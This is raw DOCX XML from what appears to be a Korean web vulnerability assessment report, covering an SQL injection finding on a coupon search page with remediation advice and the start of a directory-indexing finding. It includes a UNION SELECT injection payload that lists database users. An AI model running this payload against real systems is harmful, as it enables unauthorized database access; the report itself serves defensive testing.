          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠폰</w:t>
      </w:r>
      <w:r w:rsidR="003B54C1" w:rsidRPr="003B54C1">
        <w:t xml:space="preserve"> 번호 검색창에 DB유저 확인 쿼리 입력</w:t>
      </w:r>
      <w:bookmarkStart w:id="306" w:name="_Hlk206601264"/>
      <w:bookmarkEnd w:id="303"/>
      <w:bookmarkEnd w:id="304"/>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w14:paraId="2E477B3A" w14:textId="6C1D086F" w:rsidR="003B54C1" w:rsidRDefault="003B54C1" w:rsidP="005825F2">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="005825F2" w14:paraId="517CAD41" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7C43D62E" w14:textId="1E8B96AF" w:rsidR="005825F2" w:rsidRPr="005825F2" w:rsidRDefault="005825F2" w:rsidP="004807F2">
            <w:r w:rsidRPr="0004046A">
              <w:t xml:space="preserve">' </w:t>
            </w:r>
            <w:r w:rsidRPr="005825F2">
              <w:t>UNION</w:t>
            </w:r>
            <w:r w:rsidRPr="0004046A">
              <w:t xml:space="preserve"> SELECT 1, 2, username, 'a', 'b', 'c',</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0004046A">
              <w:t>'d' FROM all_users--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23027A20" w14:textId="7A8EE464" w:rsidR="00995BFE" w:rsidRDefault="00091D2A" w:rsidP="00A32FF1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="_Toc206630368"/>
      <w:bookmarkStart w:id="308" w:name="_Toc206630506"/>
      <w:bookmarkStart w:id="309" w:name="_Toc206631716"/>
      <w:bookmarkStart w:id="310" w:name="_Toc206631765"/>
      <w:bookmarkStart w:id="311" w:name="_Ref206631822"/>
      <w:bookmarkStart w:id="312" w:name="_Toc209094671"/>
      <w:r w:rsidRPr="00091D2A">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00104B4A">
        <w:t>코드</w:t>
      </w:r>
      <w:r w:rsidRPr="00091D2A">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1</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EB6B90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EB6B90">
        <w:instrText xml:space="preserve"> TC "</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="313" w:name="_Toc206631000"/>
      <w:r w:rsidR="00EB6B90" w:rsidRPr="00B74A08">
        <w:instrText xml:space="preserve">[코드] </w:instrText>
      </w:r>
      <w:r w:rsidR="00EB6B90" w:rsidRPr="00B74A08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText>1</w:instrText>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
      <w:r w:rsidR="00EB6B90">
        <w:instrText xml:space="preserve">" \f A \l "1" </w:instrText>
      </w:r>
      <w:r w:rsidR="00EB6B90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="314" w:name="_Toc206631852"/>
      <w:r w:rsidR="005825F2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00291F53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005825F2" w:rsidRPr="005825F2">
        <w:t>DB유저 확인 쿼리</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
      <w:bookmarkEnd w:id="308"/>
      <w:bookmarkEnd w:id="309"/>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
      <w:bookmarkEnd w:id="314"/>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w14:paraId="3113E8C8" w14:textId="77777777" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D5FB40" w14:textId="098D8BA3" w:rsidR="00995BFE" w:rsidRPr="00CB22A6" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">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995BFE" w:rsidRPr="00B112DB" w14:paraId="722A3882" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2314A1BD" w14:textId="77777777"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98DA12E" w14:textId="521DACC1"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96D5386" w14:textId="77777777"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C37A5E" w:rsidRPr="00B112DB" w14:paraId="3AC04EE6"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8C6C4BE" w14:textId="77777777" w:rsidR="00C37A5E" w:rsidRPr="00CB22A6" w:rsidRDefault="00C37A5E" w:rsidP="00C37A5E">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768E0E" w14:textId="1B3896CC" w:rsidR="00C37A5E" w:rsidRPr="00CB22A6" w:rsidRDefault="00C37A5E" w:rsidP="00C37A5E">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t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>쿠폰</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B34918B" w14:textId="3D5DB043" w:rsidR="00C37A5E" w:rsidRPr="00CB22A6" w:rsidRDefault="00C37A5E" w:rsidP="00C37A5E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007948D1">
              <w:t>/couponList.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E9F9961" w14:textId="77777777" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCC178C" w14:textId="77777777" w:rsidR="00995BFE" w:rsidRPr="00CB22A6" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2EE53" w14:textId="31257C79" w:rsidR="00CC250B" w:rsidRDefault="00991A13" w:rsidP="002B7B98">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자</w:t>
      </w:r>
      <w:r w:rsidRPr="00991A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 입력이 직접 쿼리에 포함되지 않도록 바인딩 변수를 사용하고, 모든 입력값은 화이트리스트 방식으로 검증해야 합니다. 또한</w:t>
      </w:r>
      <w:r w:rsidR="0020627B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00991A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 비정상적인 요청이 발생했을 때 데이터베이스의 상세 에러 메시지를 그대로 노출하지 말고, 일반적인 에러 페이지로 처리하는 것이 안전합니다. 웹 방화벽에 SQL 인젝션 차단 룰셋을 적용하면 공격 시도를 사전에 탐지하고 차단할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C6493D" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRDefault="00CC250B">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39EE2EE" w14:textId="6A873F48" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc209094556"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>디렉터리 인덱싱</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w14:paraId="6174AB30" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF661F9" w14:textId="42F88A1D" w:rsidR="00923875" w:rsidRDefault="00923875" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00923875">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00923875">
        <w:t xml:space="preserve"> 서버의 미흡한 설정으로 인해 디렉터리 목록 표시 기능이 켜져 있을 때, 사용자가 해당 디렉터리 내에 있는 모든 파일과 하위 폴더 목록</w:t>
      </w:r>
      <w:r w:rsidR="004A4329">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r w:rsidRPr="00923875">
        <w:t xml:space="preserve"> 웹 페이지</w:t>
      </w:r>
      <w:r w:rsidR="004A4329">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 노출될 수 있는</w:t>
      </w:r>
      <w:r w:rsidRPr="00923875">
        <w:t xml:space="preserve"> 취약점입니다.</w:t>
      </w:r>
      <w:r w:rsidR="000E09D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E09D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또한,</w:t>
      </w:r>
      <w:r w:rsidR="000E09D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E09D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>민감한 정보가 포함된 설정 파</w:t>
      </w:r>
      <w:r w:rsidR="00282C05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일 등이 노출될 경우 보안상 심각한 위험을 초래할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278FE8D7" w14:textId="77777777" w:rsidR="00E237CF" w:rsidRDefault="00E237CF" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2705D587" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRPr="00CB22A6" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752710D5" w14:textId="0F61B250" w:rsidR="00905574" w:rsidRDefault="00905574" w:rsidP="00905574">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>특정 경로에 직접 접근함으로써 해당 디렉터리에 포함된 파일 목록을 열람할 수 있는 취약점이 발견되었습니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 소스코드,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>설정 파일,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>백업 파일 등 원래 외부에 노출</w:t>
      </w:r>
      <w:r w:rsidR="00CA6CF8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>되면 안</w:t>
      </w:r>
      <w:r w:rsidR="008E5634">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6CF8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>되는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 민감한 정보가 유출될 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32026DB9" w14:textId="77777777" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0" w:rsidP="00905574">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="386B3A07" w14:textId="0A4B2BB9" w:rsidR="00CC250B" w:rsidRPr="00C0796F" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251503616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53A593FA" wp14:editId="370B173C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1017270</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1810385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2804160" cy="251460"/>
                <wp:effectExtent l="0" t="0" r="15240" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="60" name="직사각형 60"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="28041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FFC45" id="직사각형 60" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:80.1pt;margin-top:142.55pt;width:220.8pt;height:19.8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NlrwIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHejpLRRN1XUKgip&#10;aita1LPjtbMreT3GdrIJt/IOSH0DLhx4LlTegbH3p1GpOCBy2Hg8M994vvk5Od3WimyEdRXonGYH&#10;KSVCcygqvcrpx9vFmyNKnGe6YAq0yOlOOHo6e/3qpDFTMYISVCEsQRDtpo3Jaem9mSaJ46WomTsA&#10;IzQqJdiaeRTtKiksaxC9VskoTQ+TBmxhLHDhHN6et0o6i/hSCu6vpHTCE5VTfJuPXxu/y/BNZids&#10;urLMlBXvnsH+4RU1qzQGHaDOmWdkbas/oOqKW3Ag/QGHOgEpKy5iDphNlj7L5qZkRsRckBxnBprc&#10;/4Pll5trS6oip4dIj2Y11ujx2/3jl+8/f9z/evhK8Bo5aoyboumNubad5PAYEt5KW4d/TIVsI6+7&#10;gVex9YTj5egoHWcBn6NuNMnGLWjy5G2s8+8E1CQccmqxbpFOtrlwHiOiaW8SgmlYVErF2ilNGmy8&#10;43SSRg8HqiqCNtg5u1qeKUs2DMu/WKT4C9kg2p4ZSkrjZcixzSqe/E6JgKH0ByGRoZBHGyH0phhg&#10;GedC+6xVlawQbbTJfrDeI4aOgAFZ4isH7A6gt2xBeuz2zZ19cBWxtQfnLvW/OQ8eMTJoPzjXlQb7&#10;UmYKs+oit/Y9SS01gaUlFDvsHwvtYDnDFxVW8II5f80sThIWHbeDv8KPVICVgu5ESQn280v3wR4b&#10;HLWUNDiZOXWf1swKStR7ja1/nI3HYZSjMJ68HaFg9zXLfY1e12eA1c9wDxkej8Heq/4oLdR3uETm&#10;ISqqmOYYO6fc21448+3GwDXExXwezXB8DfMX+sbwAB5YDR16u71j1nRt7HEALqGfYjZ91s2tbfDU&#10;MF97kFVs9SdeO75x9GPjdGsq7JZ9OVo9LdPZbwAAAP//AwBQSwMEFAAGAAgAAAAhAFQcZ27fAAAA&#10;CwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoHQNJFOJUgIQQqAco7d2Nt0nU&#10;2I5iNwl/z3KC42ifZt+U68X2bMIxdN4pSFYCGLram841CnZfLzc5sBC1M7r3DhV8Y4B1dXlR6sL4&#10;2X3itI0NoxIXCq2gjXEoOA91i1aHlR/Q0e3oR6sjxbHhZtQzldueSyFSbnXn6EOrB3xusT5tz1bB&#10;hz8deb+X8j17epXZm83nZtoodX21PD4Ai7jEPxh+9UkdKnI6+LMzgfWUUyEJVSDz+wQYEalIaMxB&#10;wa28y4BXJf+/ofoBAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAq7dzZa8CAACUBQAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAVBxnbt8AAAALAQAA&#10;DwAAAAAAAAAAAAAAAAAJBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABUGAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007263B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7767DB" wp14:editId="3F871BDC">
            <wp:extent cx="4571365" cy="2602230"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="26670"/>
            <wp:docPr id="1951474562" name="그림 19514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그림 931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2988" t="34153" r="58754" b="25209"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="26025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E0234" w14:textId="77D41EF5" w:rsidR="00CC250B" w:rsidRPr="00D30F4D" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="_Toc209094587"/>
      <w:r w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림] </w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007263B3" w:rsidRPr="00D30F4D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dirb 도구를 이용해 폴더 탐색</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p w14:paraId="3CC72855" w14:textId="77777777" w:rsidR="00CC250B" w:rsidRPr="00CB22A6" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F631B7F" w14:textId="5F6EF83F" w:rsidR="00CC250B" w:rsidRDefault="00CC250B" w:rsidP="00CC250B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251483136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12A4144D" wp14:editId="3D449034">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2411730</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="975360" cy="213360"/>
                <wp:effectExtent l="0" t="0" r="15240" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="61" name="직사각형 61"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="975360"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48E2" id="직사각형 61" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:189.9pt;margin-top:23.25pt;width:76.8pt;height:16.8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P62sAIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r3bSpl2NOkXQIsOA&#10;oi3WDj0rshwbkEVNUuJkt+4fCuwPdtlh3zV0/zBKst2gK3YYloNDieQj+UTy5HTTSLIWxtagcjra&#10;SykRikNRq2VOP97O37ylxDqmCiZBiZxuhaWn09evTlqdiTFUIAthCIIom7U6p5VzOksSyyvRMLsH&#10;WihUlmAa5vBolklhWIvojUzGaXqYtGAKbYALa/H2PCrpNOCXpeDuqiytcETmFHNz4WvCd+G/yfSE&#10;ZUvDdFXzLg32D1k0rFYYdIA6Z46Rlan/gGpqbsBC6fY4NAmUZc1FqAGrGaXPqrmpmBahFiTH6oEm&#10;+/9g+eX62pC6yOnhiBLFGnyjx2/3j1++//xx/+vrA8Fr5KjVNkPTG31tupNF0Re8KU3j/7EUsgm8&#10;bgdexcYRjpfHR5P9Q2Sfo2o82vcyoiRPztpY905AQ7yQU4PPFthk6wvromlv4mMpmNdS4j3LpCIt&#10;9t1xOkmDhwVZF17rldYsF2fSkDXD15/PU/x1gXfMMA2pMBtfYiwqSG4rRQzwQZRIEJYxjhF8a4oB&#10;lnEulBtFVcUKEaNNdoP1HqFmqRDQI5eY5YDdAfSWEaTHjgx09t5VhM4enLvS/+Y8eITIoNzg3NQK&#10;zEuVSayqixzte5IiNZ6lBRRbbB8Dca6s5vMaX/CCWXfNDA4SPjouB3eFn1ICvhR0EiUVmM8v3Xt7&#10;7G/UUtLiYObUfloxIyiR7xV2/vHo4MBPcjgcTI7GeDC7msWuRq2aM8DXx+bG7ILo7Z3sxdJAc4c7&#10;ZOajooopjrFzyp3pD2cuLgzcQlzMZsEMp1czd6FuNPfgnlXfobebO2Z018YO+/8S+iFm2bNujrbe&#10;U8Fs5aCsQ6s/8drxjZMfGqfbUn617J6D1dMunf4GAAD//wMAUEsDBBQABgAIAAAAIQB6ALrS3wAA&#10;AAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT4NAFITvJv6HzTPxZpdCWxB5NGpijI0HrXrfwiuQ&#10;7r4l7Bbw37ue9DiZycw3xXY2Wow0uM4ywnIRgSCubN1xg/D58XSTgXBeca20ZUL4Jgfb8vKiUHlt&#10;J36nce8bEUrY5Qqh9b7PpXRVS0a5he2Jg3e0g1E+yKGR9aCmUG60jKNoI43qOCy0qqfHlqrT/mwQ&#10;3uzpKPVXHO/Sh+c4fTHZ1IyviNdX8/0dCE+z/wvDL35AhzIwHeyZayc0QpLeBnSPsNqsQYTAOklW&#10;IA4IWbQEWRby/4PyBwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAA